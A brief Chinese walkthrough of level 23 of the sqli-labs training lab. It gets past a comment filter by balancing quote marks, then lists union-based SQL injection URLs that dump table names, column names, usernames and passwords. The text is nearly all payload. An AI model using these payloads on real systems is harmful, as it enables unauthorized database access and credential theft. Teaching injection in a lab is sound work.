第 23 关对注入字符做了正则表达式的过滤,所以需要在引号上下功夫:
http://sqlilabs/Less-23/?id=1' and '1
知道了原理构造起来就很简单了:
–查表
http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(table_name) from informatIon_schema.tables where table_schema=database()),3 and '1' = '1
简化:
http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(table_name) from informatIon_schema.tables where table_schema=database()),'3
–查列
http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(column_name) from informatIon_schema.columns where table_schema=database() and table_name='users'),'3
–查数据
http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(username) from users),'3
http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(password) from users),'3
😄